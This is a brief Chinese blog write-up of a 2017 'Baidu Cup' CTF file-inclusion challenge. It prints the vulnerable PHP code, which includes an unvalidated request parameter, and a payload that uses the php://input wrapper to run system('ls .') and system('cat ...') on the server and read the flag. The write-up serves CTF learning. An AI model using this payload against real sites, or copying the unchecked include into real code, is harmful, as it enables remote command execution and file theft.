“百度杯”CTF比赛 2017 二月场_include_WriteUp
打开网站
题目类型:文件包含
代码审计
<?php
show_source(__FILE__);
if(isset($_REQUEST['path'])){
include($_REQUEST['path']); //包含path传递的参数
}else{
include('phpinfo.php');
}
思路
使用php://input伪协议
获得flag
payload
/?path=php://input
<?php system('ls .');?>
<?php system('cat dle345aae.php');?>
本文来自博客园,作者:oldliutou,转载请注明原文链接:https://www.cnblogs.com/oldliutou/p/15629164.html